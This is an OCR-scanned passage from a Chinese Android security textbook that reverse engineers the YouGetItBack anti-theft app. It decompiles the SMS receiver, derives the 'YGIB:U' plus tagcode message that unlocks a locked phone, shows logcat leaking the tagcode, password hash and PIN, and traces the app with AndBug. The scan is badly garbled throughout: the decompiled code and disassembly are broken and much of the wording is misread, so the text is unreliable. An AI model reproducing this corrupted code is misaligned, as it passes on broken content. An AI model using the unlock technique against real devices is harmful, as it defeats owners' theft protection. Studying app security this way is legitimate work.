假设 你 想 构造 能 被 这 一 应 用 处 理 的 有 效 短信 消息 ,你 很 可 能 需要 仔细 查看 isvalidMessage 
函数 ， 该 孔 数 通过 getDisplayMessageBody 从 短信 消息 中 获取 到 一 个 字符 串 以 及 当前 应 用 的 
上 上 下文。 对 isvalidqMessage 图 数 进行 反 编 译 ， 可 以 让 你 更 次 入 地 了 解 该 应 用 的 行为 : 


private boolean isValidMessage (String pl2, android.content.Context P13) 


{ 




















V5 = pl3.getSstring (1.82104701918e+38); 
V0 = pl3.getSstring (1.821047222e+38); 
V4 = pl3.getSstring (1.82104742483e+38); 
V3 = pl3.getSstring (1.82104762765e+38); 
V7 = pl3.getstring (1.82104783048e+38); 
Vl = pl3.getSstring (1.8210480333e+38); 
V2 = pl3.getstring (1.82104823612e+38); 
v6 = pl3.getSstring (1.82104864177e+38); 
v8 = pl3.getstring (1.82104843895e+38); 
this.getAction (p12); 
if ((this.equals (v5) == 0) && ((this.egquals (v4) == 0) && 
((this.egquals (v3) == 0) && 
((this.equals (v0) == 0) && ((this.equals (v7) == 0) && 
((this.equals (v6) == 0) && ((this.equals (v2) == 0) && 
((this.equals(v8) == 0) && (this.equals (vi) == 0))))))))) { 
LO .0 
} else { 
LO Er 


} 


return v10; 


} 
可 以 看 到 应 用 当前 上 下 文 对 象 get String 函数 的 许多 次 调用 ， 这 将 从 应 用 的 字符 串 列表 中 
(如 那些 存放 在 values/strings.xml 中 的 ), 根据 给 定 资源 ID 获取 文本 字符 串 的 值 。 值 得 注意 的 是 ， 
传递 给 getstring 的 资源 ID 看 起 来 有 些 奇 怪 ， 这 是 一 些 反 编译 器 类 型 传播 存在 的 问题 ， 你 可 
能 会 随时 遇 到 。 这 一 方法 从 字符 串 列表 中 获取 到 这 些 字符 串 后 ， 会 将 它们 与 p12 中 的 字符 串 进 









































82 第 4 章 应 用 安全 性 评估 





行 比较 ， 如 果 p12 被 匹配 到 ， 方 法 将 返回 1， 否 则 将 返回 0。 回 到 onReceive 方法 ， 这 个 结果 
会 用 来 决定 isPinLock 是 否 被 调用 ， 以 及 processcontent 是 否 被 调用 。 我 们 先 来 看 下 
isPinLock 限 数 。 


In [173]: d.CLASS_Lcom yougetitback_ androidapplication SmsIntentReceiver. 
METHOD_isPinLock.source!() 
private boolean isPinLock(String p6, android.content.Context p7) 


{ 


V2 Ee 03 
V0 = p7.getSharedPreferences ("SuperheroprefsFile", 0).getString 
(OLY mn 人 
if ((vO.compareTo("") != 0) && (p6.compareTo(v0) == 0)) { 
二 


} 


return v2; 


} 
共享 配置 文件 在 这 里 又 出 现 了 。 这 个 简短 的 函数 调用 了 getstring 来 获取 
SuperheroPrefsFile 文件 中 pin 条 目的 值 ， 然 后 与 p6 中 的 值 进行 对 比 ， 返 回 比较 结果 的 true 或 
false。 如 果 比 较 结果 为 true， 则 onReceive 调用 triggeraAppLaunch。 对 这 个 函数 的 反 编 
译 可 以 让 你 进一步 理解 整个 流程 。 
private void triggerAppLaunch (android.content.Context p9, 


android.telephony .SmsMessage p10) 
{ 





























this.currentContext = p9; 
V4 = p9.getSharedPreferences ("SuperheropPrefsFile", 0); 
if (v4.getBoolean("Activated", 0) != 0) { 
v1 = v4.edit (); 
vi.putBoolean("lockState", 1); 
vi.putBoolean("smspinlock", 1); 
vl.commit (); 
this.foregroundUI (p99); 
v0 = pl0.getOriginatingAddress () ; 
V2 = new android.content.Intent ("com.yougetitback. 
androidapplication.FOREGROUND"); 
v2.setClass (p9, com.yougetitback.androidapplication . 
FindLocationService); 
V2 .putExtra("LockSmsOriginator", v0); 
p9 .startService (v2); 
this.startSiren (p99); 
V3 = new android.content.Intent ("com.yougetitback. 
androidapplicationn.FOREGROUND"); 
v3.setClass (this.currentContext, com.yougetitback. 
androidapplication.LockAcknowledgeService); 
this.currentContext.startService (v3); 





} 
在 这 里 ， 对 SuperheroPrefsFile 文件 进行 了 一 些 编辑 : 为 一 些 键 值 设置 某 些 布尔 值 ， 指 明 屏 
幕 是 否 锁定 ， 以 及 是 否 通过 短信 进行 锁 屏 。 最 终 ， 创 建 了 一 些 新 的 Intent， 来 启动 应 用 的 
FindLocationService 和 LockAcknowledgeService 服务 ， 这 两 个 服务 之 前 在 你 列举 服务 
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列表 时 都 已 经 看 到 过 。 你 可 以 不 去 深入 分 析 这 些 服务 ， 而 根据 命名 猜测 它们 的 用 途 。 你 还 需要 回 
过 头 来 理解 onReceive 中 对 processcontent 的 调用 。 
In [613]: f = d.CLASS Lcom yougetitback_androidapplication_ 
SmsIntentReceiver.METHOD processContent.source!() 
private void processContent (android.content.Context p16, String p17) 
{ 
v6 = D16.getString (1.82104701918e+38); 
V1 = pl6.getSstring (1.821047222e+38); 
V5 = pl6.getSstring (1.82104742483e+38); 
v4 = pl6.getSstring (1.82104762765e+38); 
V8 = pl6.getSstring (1.82104783048e+38); 
V11 = this.split (p17); 
V10 = vil.elementAt (0); 
if (pl6.getSharedPreferences ("SuperheropPrefsFile", 
0) .getBoolean("Activated", 0) == 0) { 
if (vi0O.egquals (v5) != 0) { 
this.processActivationMsg (p16, v11); 
} else { 
if ((vi0.equals(v6) == 0) && ((vi0.equals (v5) == 0) && 
((V10.eduals(v4) == 0) && ((vi0.equals (v8) == 0) && 
((vi0O.equals (v7) == 0) && ((vli0.equals (v3) == 0) && 
(vi0.equals (v1l) == 0))))))) { 
vli0.equals (v2); 
} 
if (vi0.equals(v6) == 0) { 
if (vi0O.equals(v9) == 0) { 
if (vi0O.egquals (v5) == 0) { 
if (vi0O.egquals (v4) == 0) { 
if (vi0O.equals (v1) == 0) { 
if (vi0O.egquals (v8) == 0) { 
if (vi0O.egquals (v7) == 0) { 
if (vi0.equals(v3) == 0) { 
if (vi0.equals(v2) != 0) { 
this.processDeactivateMsg (p16, v11); 
} 
} else { 
this.processFindMsg (p16, v11); 
} 
} else { 
this.processResyncMsg (p16, v11); 
} 
} else { 
this.processUnLockMsg (p16, v11); 
} 
在 这 个 函数 中 ， 你 大 到 也 isValidMessage 函数 中 类 似 的 一 些 对 get string 函数 的 调 
用 ， 以 及 一 系列 的 if 语句 ， 这 些 语句 对 短信 消息 的 内 容 进行 进一步 匹配 ， 来 决定 后 续 调 用 哪些 
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方法 。 其 中 特别 有 趣 的 是 弄 清楚 如 何 才能 到 达 processUnLockMsg， 这 很 可 能 就 是 对 设备 进行 
解锁 的 函数 。 在 这 个 函数 调用 之 前 ， 有 一 些 对 消息 体 字符 串 p17 进行 的 split 方法 调用 。 
In [1017]: d.CLASS_Lcom yougetitback_ androidapplication_ 
SmsIntentReceiver.METHOD_split.source!() 


java.util.Vector split (String p6) 
{ 





V3 = new java.util.Vector(); 
2 0 
do { 
V1 = p6;indexOf(™ "; V2); 
i A 7 0 
vO £ BESUDetreing (v2) 3 
} else { 
v0 = p6.substring (v2, v1); 


v3.addElement (v0); 
v2 = (vl + 1); 
} while(vl != -1); 
return v3; 


} 
这 个 相对 简单 的 方法 以 消息 内 容 作为 输入 ， 并 把 它 切 分 到 一 个 Vector (类似 于 数组 ) 中 ， 然 
后 返回 这 个 Vector。 回 到 processContent 方法 中 ,忽略 掉 一 大 堆 if 语句， 看 起 来 v8 中 无 论 
是 什么 东西 都 是 很 重要 的 。 仍 然 有 资源 DD 的 麻烦 ， 尝 试 反 汇编 代码 ， 你 可 能 会 有 更 好 的 运气 : 


In [920]: d.CLASS_Lcom yougetitback_androidapplication_ 
SmsIntentReceiver.METHOD processContent.show!() 






































尖 吸 下 





12 (00000036) const V13, 2131296282 

13 (0000003c) move-object/froml16 Os 16 

14 (00000040) invoke-virtual VO YL3:y 
Landroid/content/Context;->getString(I)Ljava/lang/String; 

15 (00000046) move-result-object v4 

16 (00000048) const Vi3 213.296283 

17 (0000004e) move-object/froml16 vO, v1i6 

18 (00000052) invoke-virtual VO V3:; 
Landroid/content/Context;->getString(I)Ljava/lang/String; 

19 (00000058) move-result-object v8 























现在 你 看 到 了 数字 形式 的 资源 ID ， 整 数 2131296283 对 应 的 是 进入 你 所 关注 寄存 器 v8 中 的 
内 容 ， 当 然 ， 你 仍然 需要 知道 这 些 资源 了 D 的 实际 文本 字符 串 值 。 为 了 找到 这 些 值 ， 你 可 以 在 
androlyze 工具 中 使 用 一 小 段 Python 代码 来 分 析 APK 的 资源 : 

aobj = a.get_androiqd resources() 

resid = 2131296283 

pkg = aobj.packages.keys() [0] 


reskey = aobj.get_id(pkg,resid)[1] 
aobj.get_string (pkg,reskey) 
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这 段 Python 代码 首先 创建 了 一 个 ARSCParser 对 象 aobj ， 表 示 APK 中 的 所 有 支持 资源 ， 
如 字符 串 、UI 布局 等 。 接 着 resia 变量 中 持 有 你 所 关注 的 数字 形式 资源 ID ， 然 后 使 用 
aobj .packages .keys 获取 到 一 个 程序 包 名 称 / 标 识 符 的 列表 , 存储 到 pkg 中 。 通过 调用 aobj. 
get_id 并 传递 pkg 和 resia 参数 ， 文 本 形式 的 资源 key 会 被 存放 到 reskey 变量 中 。 最 后 ， 
使 用 aobj .get_string 来 获取 reskey 的 字符 串 值 。 

最 终 ， 这 段 代码 输出 由 processContent 解析 出 的 真实 字符 串 YGIB:U。 简 洁 起 见 ， 通 过 
一 行 代码 来 完成 ， 如 下 所 示 : 


In [25]: aobj.get_string(aobj.packages.keys() [0],aobj.get_id(aobj. 
packages .keys()[0],2131296283) [1]) 





Out [25] : [uu'YGIB_UNLOCK', u'YGIB:U'] 
在 这 个 时 候 ， 我 们 知道 了 短信 中 需要 包含 YGIB:U 才 可 能 到 达 processUnLockMsg 方法 调 
用 。 查 看 下 这 个 方法 ， 看 看 是 否 有 其 他 你 需要 了 人 解 的 信息 : 


In [1015]: d.CLASS_Lcom yougetitback_ androidapplication_ 
SmsIntentReceiver.METHOD processUnLockMsg.source() 
private void processUnLockMsg (android.content.Context p16, 
java.util.Vector p17) 

人 

















V9 = pl6.getSharedPreferences ("SuperheroPrefsFile", 0); 
if (B17.S1iZe() Sa 2) 
V1 = pl7.elementAt (1); 
if (v9.getSstring("tagcode", "") == 0) { 

android.util.Log.v ("SWIPEWIPE", 
"recieved unlock message"); 

com.yougetitback.androidapplication.wipe.WipeController. 
stopWipeService (p16); 

V7 = new android.content.Intent ("com.yougetitback. 
androidapplication.BACKGROUND"); 

V7.setClass (p16, com.yougetitback.androidapplication. 
ForegroundService); 

pl6.stopService (v7); 

V10 = new android.content.Intent ("com.yougetitback. 
androidapplication.BACKGROUND"); 

vli0.setClass (p16, com.yougetitback.androidapplication. 
SirenService); 

pl6.stopService (v1i0); 

v9.edit () ; 

V6 = v9.edit(); 

v6.putBoolean("lockState", 0); 

MODULSteErne( LooRLior, ys 

v6.commit (); 

V5 = new android.content.Intent ("com.yougetitback . 
androidapplication.FOREGROUND"); 

v5.setClass (p16, com.yougetitback.androidapplication. 
UnlockAcknowledgeService); 

pl6.startService (v5); 





return; 


} 


这 次 你 看 到 一 个 名 为 tagcode 的 键 从 SuperheroPrefsFile 文件 中 取出 ， 然 后 一 系列 的 服务 会 被 
关闭 ， 而 另 有 一 个 服务 被 启动 ， 你 可 能 会 猜想 可 以 解锁 手机 了 。 但 这 似乎 并 不 正确 ， 因 为 这 看 起 
来 像 是 只 要 这 个 键 存在 于 共享 配置 文件 中 ， 就 会 被 评估 为 true， 这 很 可 能 是 反 编译 器 的 错误 ， 
所 以 让 我 们 使 用 pretty_show 来 检查 下 反 汇 编 代 码 : 


In [1025]: d.CLASS_Lcom yougetitback_ androidapplication_ 
SmsIntentReceiver.METHOD_ processUnLockMsg.pretty_show!() 





12 (00000036) 
13 (0000003a) 
14 (0000003c) 
15 (00000040) 

















const-string V13, 'SuperheroprefsFile' 
const/4 v1i4, 0 
move-object/fromi6 v0, v1i6 

invoke-virtual VO VlSr “VI4, 


Landroid/content/Context;->getSharedPreferences 





(Ljava/lang/SsString; 
16 (00000046) 
17 (00000048) 
18 (0000004c) 
19 (00000050) 
size()I 


20 (00000056) 
21 (00000058) 
22 (0000005a) 


I)Landroid/content/SharedPreferences; 


move-result-object v9 
const-string 5 
const-string NA 


invoke-virtual/rangev1l7, Ljava/util/Vector;-> 





move-result V13 
const/4 人 1 渤 ，*2 
1 V13, v1i4, 122 


[ processUnLockMsg-BB@O0xS5e processUnLockMsg-BB@Oxl4e |] 


processUnLockMsg-BB@Ox5e 


23 (0000005e) 
24 (00000060) 
25 (00000064) 


Ljava/util/Vector;->elementAt (I)Ljava/lang/Object; 


26 (0000006a) 
27 (0000006c ) 
28 (00000070 ) 
29 (00000074) 
30 (00000078 ) 


Ljava/lang/SsString; 
31 (0000007e) 
32 (00000080) 








33 (00000086) 


34 (00000088) 
>CompareTo ( 

35 (0000008e) 

36 (00000090) 


Ljava/lang/String;)I 





const/4 V137 1 
move-object/fromil6 0 1 

invoke-virtual vO, v13, 
move-result-object v1 

check-cast v1l, Ljava/lang/SsString; 
const-string V13, 'tagcode' 
const-string 和 
invoke-interface V9 i 1 


Landroid/content/SharedPreferences;->getStringl( 
Ljava/lang/String; Ljava/lang/String;) 


move-result-object V13 
invoke-virtual 人 


Lcom/yougetitback/androidapplication/ 
SmsIntentReceiver;->EvaluateToken\( 
Ljava/lang/String;)Ljava/lang/String; 


move-result-object v14 
invoke-virtual V13, v14, Ljava/lang/String;- 





move-result V13 
if-nez V1l3, 95 [ processUnLockMsg-BB@ 
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0x94 processUnLockMsg-BB@O0xl4e |] 


processUnLockMsg-BB@O0x94 : 


37 (00000094) const-string V13， 'SWIPEWIPE' 
38 (00000098) const-string V14, 'recieved unlock message' 
39 (0000009c) invoke-static V13, v14, Landroid/util/Log;- 


>v(Ljava/lang/sString; Ljava/lang/String;)I 

40 (000000a2) invoke-static/range v16, 
Lcom/yougetitback/androidapplication/wipe/WipeController; 
->stopWipeService(Landroid/content/Context;)V 
[ processUnLockMsg-BB@O0xa8 | 


这 段 代 码 消除 掉 了 错误 ， 输 入 Vector 中 第 二 个 元 素 的 值 会 被 传递 给 EvaluateToken， 而 
返回 值 会 被 与 共享 配置 文件 中 的 tagcode 键 值 进行 比较 ， 如 果 这 两 个 值 匹 配 ， 那 么 这 个 方法 才 
会 像 你 之 前 看 到 的 那样 继续 执行 。 看 到 这 ， 你 应 该 意识 到 你 的 短信 必须 是 YGIB:U 后 跟 一 个 空 
格 和 tagcode 值 的 格式 。 而 在 一 个 已 经 root 的 设备 上 ， 获 取 这 个 tagcode 是 非常 简单 的 ， 直 接 
从 文件 系统 中 读 取 SuperheroPrefsFile 文件 即 可 。 不 过 ， 还 是 让 我 们 尝试 一 些 动态 分 析 方 法 ， 
看 看 能 够 有 新 的 发 现 。 


4.2.3 动态 分 析 


动态 分 析 方 法 需要 运行 应 用 , 通常 会 在 插 桩 或 监控 的 方式 下 进行 ,以 获取 关于 应 用 行为 更 具 
体 的 信息 。 这 通常 需要 处 理 所 有 在 运行 过 程 中 发 生 的 行为 , 如 检查 应 用 在 文件 系统 上 的 操作 痕迹 、 
观察 网 络 流量 , 以 及 监视 进程 行为 等 。 动态 分 析 方 法 对 于 验证 一 些 假设 和 测试 一 些 猜 测 是 非常 有 
效 的 。 

从 动态 分 析 方 法 的 角度 来 看 , 最 先 要 解决 的 问题 是 掌握 用 户 与 应 用 进行 交互 的 过 程 。 应 用 的 
工作 流 是 怎么 样 的 ? 拥有 哪些 菜单 、 界 面 和 设置 面板 ?” 这 些 大 多 数 可 以 通过 静态 分 析 来 发 掘 出 
来 ， 例 如 ，Activity 就 非常 容易 识别 。 然 而 深入 分 析 每 个 功能 的 详细 细节 会 非常 耗 时 ， 通 过 与 运 
行 的 应 用 进行 直接 交互 ， 经 常会 让 分 析 变 得 简单 一 些 。 

如 果 你 已 经 在 应 用 启动 时 开启 了 logcat, 那么 在 ActivityManager 启动 应 用 时 , 你 就 可 以 看 
到 一 些 熟悉 的 Activity 名 : 

I/ActivityManager( 245): START {act=android.intent.action.MAIN 

cat=[android.intent.category .LAUNCHER] flg=0x10200000 

cmp=com.yougetitback.androidapplication.virgin.mobile/ 

com.yougetitback.androidapplication.ActivateSplashScreen u=0} from pid 449 

I/ActivityManager( 245): Start proc 

com.yougetitback.androidapplication.virgin.mobile for activity 

com.yougetitback.androidapplication.virgin.mobile/ 


com.yougetitback.androidapplication.ActivateSplashScreen: 
pid=2252 uid=10080 gids={1006, 3003,，1015, 1028} 


首先 ， 你 看 到 一 个 主 Activity ( ActivateSplashScreen )， 可 以 通过 Androguard 的 
get_main activity 国 数 观察 到 图 4-5 所 示 的 主 界面 。 





















































Wo 


By/ 


Ts&CsandPermissions OL 一重 


To activate Mobile Rescue, 
you'll need to agree to these 
SES GS 


I have read, understood and 

accept the Terms of Use, the 

End User Licence Agreement, 
and the Privacy Policy 


I agree to let Mobile Rescue 
collect and use my location 
data as part of the service. 
You can switch this off later 
online, if you like. 


图 4-5 主 界面 / 主 Activity 























在 应 用 中 继 i 没 几 步 之 后 , 你 就 会 看 到 要 求 输入 PIN 码 与 安全 问题 的 界面 ,如 图 
4-6 所 示 。 提 供 这 些 信 息 之 后 ， 你 可 以 在 1ogcat 中 看 到 一 些 值得 注意 的 输出 结果 。 


D/YGIB Test( 2252): Context from— 
>com.yougetitback.androidapplication.virgin.mobile 
I/RequestConfigurationService( 2252): RequestConfigurationService 
created!!! 

D/REQUESTCONFIGURATIONSERVICE( 2252): onStartCommand 
I/ActivationAcknowledgeService( 2252): RequestConfigurationService 
created!!! 

I/RequestConfigurationService( 2252): RequestConfigurationService 
stopped!!! 

I/PingService( 2252): PingService created!!! 

D/PINGSERVICE( 2252): onStartCommand 
I/ActivationAcknowledgeService( 2252): RequestConfigurationService 
stopped!!! 

I/PingService( 2252): RequestEtagService stopped!!! 
D/C2DMReceiver( 2252): Action is com.google.android.c2dm.intent. 
REGISTRATION 

I/intent telling something( 2252): == null ===null === JIntent { 
act=com.google.android.c2gdm.intent.REGISTRATION flg=0x10 
pkg=com.yougetitback.androidapplication.virgin.mobile 
cmp=com.yougetitback.androidapp 

lication.virgin.mobile/ 
com.yougetitback.androidapplication.C2DMReceiver (has extras) } 
I/ActivityManager( 245): START 
{cmp=com.yougetitback.androidapplication.virgin.mobile/ 
com.yougetitback.androidapplication.ModifyPinScreen u=0} from piqd 2252 
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media 


PIN number 2 R37 


Right, now pick a 4 digit PIN 
that you'll easily remember. 


New PIN 1234 
DE 1234 


Security question 


Mums maiden name 





Cancel 





图 4-6 PIN 码 输入 和 安全 问题 界面 























很 确定 的 是 ,日志 中 记录 了 许多 服务 启动 和 停止 的 调用 ( 这些 服务 是 你 之 前 观察 到 的 )， 以 
及 一 些 熟悉 的 Activity 名 字 。 进 一 步 分 析 日 志 ， 你 可 以 看 到 一 个 有 趣 的 信息 泄露 问题 。 





D/update ( 2252): serverUrl-->https://virgin.yougetitback.com/ 

D/update ( 2252) settingsUrl-->vaultUpdateSettings? 

D/update ( 2252): password-->3f679195148a1960f66913d09e76fca8dd31dc96 

D/update ( 2252): tagCode-->137223048617183 

D/update ( 2252): encodedxmlData— 

>%$3c%3fxml%20version%3d'1.0'%20encoding%3d'UTF- 
'%$3f%3e%$3cConfig%3e%3cSettings%3e%3cPin%3el1234%3c 

gs2fPing3eg3cg2fSettingsg3eg3cgs2fConfigg3e 


D/YGIB Test( 2252): con.getResponseCode()-->200 

D/YGIB Test( 2252): urlString— 
>https://virgin.yougetitback.com/vaultUpdateSettings?pword= 
3£679195148a1960f£f66913d09e76fca8dd31dc96&tagid=137223048617183&type=5S 
D/YGIB Test( 2512): content-->%3c%$3fxml%20version%3d'1.0'%20encoding%3d' 
UTF-8'%3f%3e%3cConfig%3e%3cSettings%3e%3cPin%3e1234%3c%2fPin 
$3e%3c%$2fSettings%3e%3c%$2fConfig%3e 

甚至 在 应 用 工作 流 的 最 初 几 步 里 , 就 已 经 泄露 出 了 会 话 和 配置 数据 , 其 中 包括 你 已 经 在 静态 


入 
， 一、 UN 


分 析 过 程 中 看 到 过 的 tagcode。 对 应 用 的 配置 参数 进行 设置 并 存储 ， 也 会 在 日 志 缓冲 区 中 导致 类 
似 的 详细 输出 。 



































D/update ( 2252): serverUrl-->https://virgin.yougetitback.com/ 
D/update ( 2252): settingsUrl-->vaultUpdateSettings? 

D/update ( 2252): password-->3f679195148a1960f66913d09e76fca8dd31dc96 
D/update ( 2252): tagCode-->137223048617183 

D/update ( 2252): encodedxmlData— 
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尽管 这 
运行 
式 地 


开放 


设 目 


经 看 


>%3c%$3fxml%20version%3d'1.0'%20encoding%3d'UTF- 
8'%$3f%3e%3cConfig%3e®%3cSettings%3e%3cServerNo%3e+447781482187%3c%2fServerNo%3es%® 
3cServerURL%S3ehttps:%2f%2fvirgin.yougetitback.com%$2f%3c%2fServerURL%S3e®%3cBackup 
URL%S3eContactsSave%3f%3c%$2fBackupURL%3e%3cMessageURL%3ecallMainETagUSA%3f%3c%2f 
MessageURL%3e%3cFindURL%3eFind%3f%3c%2fFindURL%3e%3cExtBackupURL%3eextContactss 
ave%®3f%3c%$2fExtBackupURL%3e%3cRestoreURL%3erestorecontacts%3f%3c%2fRestoreURL%3 
e%3cCallCentre%3e+442033222955%3c%2fCallCentre%3e%3cCountryCode%3eGB%3c%2fCount 
ryCode%3e%3cPin%3el234%3c%2fPin%3e%3cURLPassword%3e3f£f679195148a1960f£f66913d09e76 
fca8dd31dc96%3c%2fURLPassword%3e%3cRoamingLock%3eoff%3c%2fRoamingLock%3e%®%3cSimL 
ock%3eon%$3c%2fSimLock%3e%3cOfflineLock%3eoff%3c%2fOfflineLock%3e%3cAutolock%20I 
nterval%3d%220%$22%3eoff%3c%2fAutolock%3e%3cCallPatternLock%200utsideCalls%3d%22 
6%22%$20Numcalls%3d%$226%22%3eon%3c%2fCallPatternLock%3e%3cCountryLock%3eoff%3c%2 
fCountryLock%3e%3c%2fSettings%3e%3cCountryPrefix%3e®%3cPprefix%3e+44%3c%2fPrefix% 
3e%$3c%2fCountryPrefix%3e%3cIntPrefix%$3e%3cInternationalPrefix%3e00%3c%2fInterna 
tionalPprefix%$3e%3c%$2fIntPrefix%3e%3c%2fConfig%3e 


如 前 所 述 , 在 Android 4.1 版 本 之 前 , 这 些 信息 对 于 具有 READ_LoGs 权限 的 应 用 是 可 访问 的 。 
这 些 泄漏 信息 可 能 对 于 截取 特殊 短信 已 经 足够 , 但 你 还 应 该 进一步 深入 了 解 这 个 应 用 是 如 何 








的 。 为 此 ， 你 可 以 使 用 一 个 名 为 AndBug 的 调试 器 。 





AndBug 连接 到 Java 调试 连 线 协 议 (JDWP ) 端点 上 ， 可 以 通过 在 应 用 的 Manifest 文件 中 显 
标注 androigd:debuggable=true， 让 应 用 进程 开放 Android 调试 桥 (ADB ) 端点 ， 或 者 
将 ro.debuggable 属性 设置 为 1 (在 出 广 设备 中 该 属性 通常 被 设置 为 0 ) 使 得 所 有 应 用 进程 都 























调试 端点 。 除 了 检查 Manifest 文件 ， 还 可 以 运行 aqb jdqwp 来 显示 出 可 调试 的 进程 ID。 假 
标 进程 是 可 调试 的 ， 你 可 以 看 到 如 下 输出 : 

$ adb jdwp 

2252 


使 用 grep 命令 来 搜索 与 我 们 目标 进程 相关 的 PID， 这 行 日 志 在 之 前 显示 的 日 志 记 录 中 也 已 








到 。 


$ adb shell ps | grep 2252 
u0_a79 2252 88 289584 36284 ffffffff 00000000 S 
com.yougetitback.androidapplication.virgin.mobile 


获取 到 这 个 信息 之 后 ， 你 可 以 将 AndBug 挂 接 到 目标 设备 和 进程 上 ， 来 获得 一 个 可 交互 的 
shell。 





使 用 shel1 命令 并 指定 目标 进程 PID。 


$s andbug shell -p 2252 


## AndBug (C) 2011 Scott W. Dunlop <swdunlop@gmail .com> 
2 


使 用 classes 命令 ， 并 提供 类 名 的 一 部 分 ， 你 可 以 看 到 在 com.yougetitpback 命名 空间 





下 有 哪些 类 ， 然 后 使 用 methods 命令 来 发 现 给 定 类 中 的 方法 : 


>> classes com.yougetitback 
## Loaded Classes 

-- com.yougetitback.androidapplication. 
PinDisplayScreens$sXMLParserHandler 

-- com.yougetitback.androidapplication.settings.main.Entrancesl1 





-- Com.yougetitback.androidapplication. 
PinDisplayScreen$pinDisplayScreenBroadcast 

-- Com.yougetitback.androidapplication.SmsIntentReceiver 

-- Com.yougetitback.androidapplication.C2DMReceiver 

-- Com.yougetitback.androidapplication.settings.setting.Setting 


>> methods com.yougetitback.androidapplication.SmsIntentReceiver 
## Methods Lcom/yougetitback/androidapplication/SmsIntentReceiver; 
-- Com.yougetitback.androidapplication.SmsIntentReceiver.<init>()y 
-- Com.yougetitback.androidapplication.SmsIntentReceiver. 
foregroundUI (Landroid/content/Context;)V 
-- Com.yougetitback.androidapplication.SmsIntentReceiver. 
getAction(Ljava/lang/String;)Ljava/lang/String; 
-- Com.yougetitback.androidapplication.SmsIntentReceiver. 
getMessagesFromIintent (Landroid/content/Intent;) [Landroid/telephony/ 
SmsMessage; 
-- Com.yougetitback.androidapplication.SmsIntentReceiver. 
isPinLock (Ljava/lang/String;Landroid/content/Context;)Z 
-- Com.yougetitback.androidapplication.SmsIntentReceiver. 
isValidMessage (Ljava/lang/String;Landroid/content/Context;)zZ 

















-- Com.yougetitback.androidapplication.SmsIntentReceiver. 
processUnLockMsg (Landroid/content/Context;Ljava/util/Vector;)yV 


在 上 面 的 代码 中 , 可 以 看 到 先前 进行 静态 分 析 和 逆向 工程 的 类 smsIntentReceiver, 以 及 








你 感 兴趣 的 一 些 方法 。 现 在 可 以 跟踪 方法 与 传递 的 参数 与 数据 。 首 先 我 们 来 跟踪 
SmsIntentReceiver 类 , 使 用 AndBug 中 的 class-trace 命令 ， 接 着 向 设备 发 送 一 个 测试 短 


信 ， 











短信 内 容 为 “Test message”: 


>> class-trace com.yougetitback.androidapplication.SmsIntentReceiver 
## Setting Hooks 
-- Hooked com.yougetitback.androidapplication.SmsIntentReceiver 


com.yougetitback.androidapplication.SmsIntentReceiver 


>> ## trace thread <1> main (running suspended) 
-- Com.yougetitback.androidapplication.SmsIntentReceiver.<init>()V:0 
-- this=Lcom/yougetitback/androidapplication/SmsIintentReceiver; 
<830009571568> 


## trace thread <1> main (running suspended) 
-- Com.yougetitback.androidapplication.SmsIntentReceiver.onReceivel 
Landroid/content/Context;Landroid/content/Intent;)V:0 
-=- this=Lcom/yougetitback/androidapplication/SmsIntentReceiver; 
<830009571568> 
-- intent=Landroid/content/Intent; <830009581024> 


## trace thread <1> main (running suspended) 

-- Com.yougetitback.androidapplication.SmsIntentReceiver. 
getMessagesFromIntent (Landroid/content/Intent;) 
[Landroid/telephony/SmsMessage;:0 

-- this=Lcom/yougetitback/androidapplication/SmsIintentReceiver; 
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<830009571568> 
-- intent=Landroid/content/Intent; <830009581024> 


-- com.yougetitback.androidapplication.SmsIntentReceiver. 
isValidMessage (Ljava/lang/String;Landroid/content/Context;)2Z:0 
-- this=Lcom/yougetitback/androidapplication/SmsIntentReceiver; 
<830009571568> 
-- msg=Test message 
-- context=Landroid/app/ReceiverRestrictedContext; <830007895400> 


短信 和 到达 后 ， 会 从 Telephony 子 系统 中 传递 过 来 ， 然 后 你 的 钩子 〈hook ) 会 触发 ， 你 就 可 以 
从 最 初 的 onReceive 方法 开始 往 后 跟踪 。 你 看 到 被 传递 给 onReceive 方法 的 Intent 消息 , 以 及 
随后 熟悉 的 短信 。 后 面 的 isValidMessage 方法 中 的 msg 变量 ,包含 着 我 们 的 短信 。 这 时 ， 往 
回 看 logcat 的 输出 日 志 ， 可 以 看 到 被 记录 的 消息 内 容 : 


I/MessageListener:( 2252): Test message 


在 class-trace 中 进行 进一步 的 深入 分 析 ， 你 看 到 对 isvalidqMessage 的 调用 ， 包 括 作 为 参 
数 传递 过 去 的 Context 对 象 以 及 这 个 对 象 中 的 一 组 字段 ， 在 本 例 中 ， is 
表 中 获取 的 资源 和 字符 串 ( 之 前 你 已 经 通过 静态 分 析 方 法 手工 解析 过 这 些 字符 串 )。 其 中 包含 
字符 串 YGIB:U 以 及 对 应 的 键 值 YGCIBUNLOCK。 回顾 你 对 这 个 方法 的 静态 分 析 ， 
查 是 否 包 含 这 些 值 ， 如 果 没 有 包含 则 会 调用 isPinLock， 如 下 所 示 : 


## trace thread <1> main (running suspended) 
-- Com.yougetitback.androidapplication.SmsIntentReceiver.getAction( 

Ljava/lang/String;)Ljava/lang/String;:0 

-- this=Lcom/yougetitback/androidapplication/SmsIntentReceiver; 
<830007979232> 

-- message=Foobarbaz 

-- Com.yougetitback.androidapplication.SmsIntentReceiver. 

isValidMessage (Ljava/lang/String;Landroid/content/Context;)2Z:63 

-- YGIBDEACTIVATE=YGIB:D 

-—- YGIBFIND=YGIB:F 

-- context=Landroid/app/ReceiverRestrictedContext; <830007987072> 

-- YGIBUNLOCK=YGIB:U 

-- this=Lcom/yougetitback/androidapplication/SmsIntentReceiver; 
<830007979232> 

-- YGIBBACKUP=YGIB:B 

= YOLBRESYNGC=YGLB: RS 

-= "GlBLOGKSYeLIB:D 

-—- YGIBWIPE=YGIB:W 

-- YGIBRESTORE=YGIB:E 

-- msg=Foobarbaz 

-- YGIBREGFROM=YGIB:T 








## trace thread <1> main (running suspended) 
-- com.yougetitback.androidapplication.SmsIntentReceiver.isPinLock( 
Ljava/lang/String;Landroid/content/Context;)Z:0 
-- this=Lcom/yougetitback/androidapplication/SmsIntentReceiver; 
<830007979232> 


4.2 案例 分 析 : 移动 安全 应 用 93 





-- msg=Foobarbaz 
-=-_ Context=Landroid/app/ReceiverRestrictedContext; <830007987072> 


在 这 个 实例 中 ，isPinLock 方法 然后 会 对 消息 进行 测试 ， 但 短信 中 不 包含 PIN 码 或 任何 像 
